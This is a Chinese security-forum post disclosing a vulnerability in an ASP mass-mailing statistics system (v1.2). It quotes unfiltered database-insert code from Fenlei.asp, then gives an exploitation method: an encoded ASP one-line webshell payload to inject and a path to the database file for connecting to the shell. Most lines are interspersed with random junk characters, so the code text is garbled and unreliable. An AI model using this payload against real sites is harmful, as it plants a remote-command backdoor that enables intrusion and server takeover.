找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1944|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp
+ f" R8 Y0 {. l5 g; O- v% z" j+ m
5 i& W3 {! u- BIF Request.QueryString("Action")="del" Then . t3 _  Z, R& j
ID=Request.QueryString("ID")
  f0 `  P& I; k) [. {0 L8 sIF Countss ("tui","Fenlei",ID )<>0 then
9 g6 W, O2 H) Z7 Y'略 4 Q6 l, z) E) U
IF Request.QueryString("Action")="Add" Then
! e( O7 t4 j0 ^Tname=Request.Form("Typename")
- K# W; p- U7 TSet Rs=Server.CreateObject("adodb.Recordset") 8 J# r0 ]. w5 w* `3 Z+ K, {
Sql="Select * From Fenlei Order by id Desc " % N9 f( B% S* u- W' d& F
Rs.Open Sql,Conn,1,3 7 O) A" ]- M* B$ S: [9 m9 o
Rs.Addnew
6 z6 g5 i/ c  g: ZRs("Typename")=Tname 9 z2 U: e. D: l
'略 # }; F5 [! N2 _/ F, n* z" X
Set Rs=Server.CreateObject("adodb.Recordset") ; \2 H3 W7 x2 L( ?+ M
Sql="Select * From Fenlei Order by id Desc " : m9 B  \0 N+ b+ I% v! o
Rs.Open Sql,Conn,1,1 * M# @! Y; q. p# {
'略 " Q2 O6 ?" ~+ ?- B; c- D
%>
) o* \4 q8 ~5 H2 @" p! N. n $ x: Z/ Q+ B+ A- U" y  t2 z1 a4 ?

/ X1 K& W4 u2 [  T1 I4 D9 | " I* E4 r# m" B
没有过滤,直接写入数据库。
8 ~" A2 a! J$ x& C
: j3 a: v1 Z  G利用方法:
" k4 u0 E! d( y& n  P
3 N7 k4 b. T8 U% L8 F插入:┼攠數畣整爠煥敵瑳∨≡┩>; i( x$ S0 }" T# x
: z# \$ p# s& H  |) M% z

' U4 n, z+ H0 \& h8 A; o连接: http://www.xxx.com/###tongbaner.asa ) C- O9 p: ]; G" {- O6 D8 \
'默认安装文件: ! y* h9 S9 y6 w. H
'install.asp# _" U7 p& C. b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表